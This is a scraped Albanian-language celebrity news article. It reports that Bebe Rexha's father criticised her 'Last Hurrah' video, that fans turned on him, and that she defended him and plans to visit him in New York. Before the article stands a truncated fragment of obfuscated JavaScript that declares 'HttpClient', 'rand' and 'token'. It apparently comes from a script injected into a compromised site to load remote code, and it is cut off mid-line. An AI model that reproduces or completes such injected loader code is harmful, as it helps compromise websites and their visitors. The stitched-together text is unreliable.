;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Fansat e Bebe Rexhës revoltohen me babain e saj që e kritikoi për klipin e fundit – ata dy madje as nuk po flasin

By

Këngëtarja Bebe Rexha, i ka qartësuar ca gjëra për marrëdhënien e saj me babanë, pasi që e ka publikuar një bisedë private në mes tyre, ku i ati e kritikonte për paraqitjen në klipin e fundit “Last Hurrah”.

Pasi e kishte publikuar këngën e re, babai i saj i kishte shkruar duke i thënë: “Më mirë ndalo së publikuar pornografi idiote sepse po më çmend. Nuk mund ta duroj më këtë”.

Babai i saj po ashtu kishte shtuar se Bebe po e turpëronte në publik dhe se është shumë i nervozuar me të.

Image result for bebe rexha and her father

Por më pas fansat e saj u revoltuan duke e kritikuar babanë e Rexhës, por ajo e ka sqaruar marrëdhënien me të duke thënë:

“Mos thoni gjëra të tilla për babain tim ju lutem, ai është një baba i mahnitshëm. Unë s’është dashur ta publikoja asnjëherë atë screenshot. Jam e zhgënjyer me veten time, po tregohesha sarkastike. E kuptoj qëllimin e tij si baba edhepse mesazhi ishte pak i ashpër. Jam e zemëruar që ai nuk po më flet, por në fund të fundit është ende babai im”, ka shtuar ajo.

Bebe Po ashtu ka vendosur të kthehet në New York për ta vizituar babanë e saj, me të cilin nuk ka folur që dy javë dhe këtë e ka treguar vet përmes një postimi një interviste per TMZ. /prive.al

Artikuj të ngjashëm